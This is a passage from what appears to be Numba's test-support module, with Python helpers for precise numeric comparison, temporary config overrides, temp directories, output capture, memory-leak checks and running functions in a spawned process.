assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.